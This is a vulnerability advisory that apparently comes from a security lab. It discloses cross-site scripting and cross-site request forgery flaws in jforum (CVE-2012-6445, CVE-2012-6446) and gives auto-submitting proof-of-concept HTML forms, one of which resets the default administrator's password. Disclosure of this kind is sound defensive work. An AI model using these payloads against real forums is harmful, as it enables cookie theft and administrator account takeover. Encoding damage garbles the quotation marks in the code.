High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in jforum, which can be exploited to perform Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks.
Multiple Cross-Site scripting (XSS) vulnerabilities in jforum: CVE-2012-6445
1.1 The vulnerability exists due to insufficient filtration of user-supplied input in âstartâ HTTP POST parameter in âjforum.pageâ script when sending any message. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in userâs browser in the context of vulnerable website. Successful exploitation requires that victim visits the malicious webpage.
Malicious webpage example:
<form action=âhttp://[host]/jforum.pageâ method=âpostâ name=âf1â>
<input type=âhiddenâ name=âactionâ value=âinsertSaveâ />
<input type=âhiddenâ name=âmoduleâ value=âpostsâ />
<input type=âhiddenâ name=âpreviewâ value=â0â/>
<input type=âhiddenâ name=âforum_idâ value=â1â />
<input type=âhiddenâ name=âstartâ value=â"><script>alert(document.cookie);</script>â />
<input type=âhiddenâ name=âtopic_idâ value=â2â />
<input type=âsubmitâ id=âbtnâ>
</form>
<script>
document.f1.submit();
</script>
1.2 The vulnerability exists due to insufficient filtration of user-supplied input in âactionâ HTTP POST parameter in âjforum.pageâ script when posting a reply. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in userâs browser in the context of vulnerable website. Successful exploitation requires that victim visits the malicious webpage.
Malicious webpage example:
<form action=âhttp://[host]/jforum.pageâ method=âpostâ name=âf1â>
<input type=âhiddenâ name=âmoduleâ value=âpostsâ />
<input type=âhiddenâ name=âdisable_htmlâ value=â1â />
<input type=âhiddenâ name=âforum_idâ value=â1â />
<input type=âhiddenâ name=âmessageâ value=â123â />
<input type=âhiddenâ name=âquickâ value=â1â />
<input type=âhiddenâ name=âstartâ value=â0â />
<input type=âhiddenâ name=âtopic_idâ value=â2â />
<input type=âhiddenâ name=âactionâ value=â"><script>alert(document.cookie);</script>â />
<input type=âsubmitâ id=âbtnâ>
</form>
<script>
document.f1.submit();
</script>
1.3 The vulnerability exists due insufficient filtration of user-supplied input in âreturnUrlâ, âforum_idâ and âtopic_idâ HTTP POST parameters in âjforum.pageâ script. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in administratorâs browser in the context of vulnerable website. Successful exploitation requires that victim visits the malicious webpage.
Malicious webpage example:
<form action=âhttp://[host]/jforum.pageâ method=âpost"name=âf1â >
<input type=âhiddenâ name=âactionâ value=âdoModerationâ />
<input type=âhiddenâ name=âlog_descriptionâ value=â" />
<input type=âhiddenâ name=âlog_typeâ value=â0â />
<input type=âhiddenâ name=âmoduleâ value=âmoderationâ />
<input type=âhiddenâ name=âtopicMoveâ value=â1â />
<input type=âhiddenâ name=âreturnUrlâ value=â"><script>alert(document.cookie);</script>â />
<input type=âhiddenâ name=âforum_idâ value=â"><script>alert(document.cookie);</script>â />
<input type=âhiddenâ name=âtopic_idâ value=â"><script>alert(document.cookie);</script>â />
<input type=âsubmitâ id=âbtnâ>
<script>
document.f1.submit();
</script>
</form>
ĐĄross-Site Request Forgery (CSRF) in jforum: CVE-2012-6446
2.1 The vulnerability exists due to insufficient verification of the HTTP request origin in âjforum.pageâ script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and change administratorâs password.
PoC (Proof-of-Concept) below will change password to âpasswordâ for user with id = 2 (default administratorâs ID):
<form action=âhttp://[host]/jforum.pageâ method=âpostâ name=âf1â>
<input type=âhiddenâ name=âactionâ value=âeditSaveâ />
<input type=âhiddenâ name=âmoduleâ value=âadminUsersâ />
<input type=âhiddenâ name=âuser_idâ value=â2â />
<input type=âhiddenâ name=âusernameâ value=âusernameâ />
<input type=âhiddenâ name=âemailâ value="[email protected]" />
<input type=âhiddenâ name=ânew_passwordâ value=âpasswordâ />
<input type=âhiddenâ name=âpassword_confirmâ value=âpasswordâ />
<input type=âhiddenâ name=âviewemailâ value=â0â />
<input type=âhiddenâ name=âhideonlineâ value=â0â />
<input type=âhiddenâ name=ânotifyreplyâ value=â1â />
<input type=âhiddenâ name=ânotify_alwaysâ value=â0â />
<input type=âhiddenâ name=ânotify_textâ value=â0â />
<input type=âhiddenâ name=ânotifypmâ value=â1â />
<input type=âhiddenâ name=âattachsigâ value=â1â />
<input type=âhiddenâ name=âallowhtmlâ value=â1â />
<input type=âhiddenâ name=âallowbbcodeâ value=â1â />
<input type=âhiddenâ name=âallowsmiliesâ value=â1â />
<input type=âhiddenâ name=ârank_specialâ value=â-1â />
<input type=âsubmitâ name=âsubmitâ value=âSubmitâ>
</form>
<script>
document.f1.submit();
</script>